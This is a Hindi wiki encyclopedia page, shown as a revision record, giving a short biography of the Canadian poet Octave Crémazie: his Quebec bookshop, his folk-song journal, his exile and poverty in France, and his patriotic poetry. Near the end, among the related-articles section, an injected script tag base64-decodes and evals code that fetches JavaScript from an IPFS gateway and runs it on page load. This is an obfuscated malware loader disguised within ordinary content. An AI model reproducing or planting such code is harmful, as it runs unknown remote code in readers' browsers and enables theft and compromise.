आक्टेव क्रेमैंजी

भारत डिस्कवरी प्रस्तुति
Revision as of 08:15, 10 June 2018 by यशी चौधरी (talk | contribs) (''''आक्टेव क्रेमैंजी''' (1822-1879 ई.) कनाडा का कवि। 8 नवंबर, 1822 ई....' के साथ नया पृष्ठ बनाया)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

आक्टेव क्रेमैंजी (1822-1879 ई.) कनाडा का कवि। 8 नवंबर, 1822 ई. को क्वेवेक में जन्म और वहाँ शिक्षा। 1848 ई. में उसने अपने दो भाइयों के सहयोग से एक किताब की दुकान खोली जो एक प्रकार से साहित्यकारों का अड्डा बना। वहाँ से उसने ‘ले स्वायरे’ कनेडियस नामक पत्रिका निकाली जिसका उद्देश्य फ्रांसीसी कनाडा के लोकगीतों को संगृहीत करना था ताकि वे लुप्त न हो जायँ। क्रेमैजी ने स्वयं अपनी कविताएँ 1854 ई. से ‘जर्नल द क्यूबेक’ में प्रकाशित करना आरंभ किया। 1863 ई. में वह कतिपय व्यापारिक कठिनाइयों में पड़ गया और कनाडा छोड़कर फ्रांस चला गया जहाँ उसका सारा जीवन दरिद्रतापूर्ण बीता। इस काल में उसने जूल्स फांटने के छद्म नाम से कविताएँ लिखीं। इस काल में उसने एक नैराश्यपूर्ण लंबी कविता लिखी और ‘पेरिस के घेरे’ पर जिसे उसने आँखों देखा था एक खंड काव्य लिखा। उसकी कविताएँ कनाडा की राष्ट्रीयता और कनाडा की प्राकृतिक छवि से ओतप्रोत हैं। हार्वे में 16 जनवरी, 1879 ई. को उसकी मृत्यु हुई।[1]



पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. हिन्दी विश्वकोश, खण्ड 3 |प्रकाशक: नागरी प्रचारिणी सभा, वाराणसी |संकलन: भारत डिस्कवरी पुस्तकालय |पृष्ठ संख्या: 221 |

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

वर्णमाला क्रमानुसार लेख खोज

                              अं                                                                                                       क्ष    त्र    ज्ञ             श्र   अः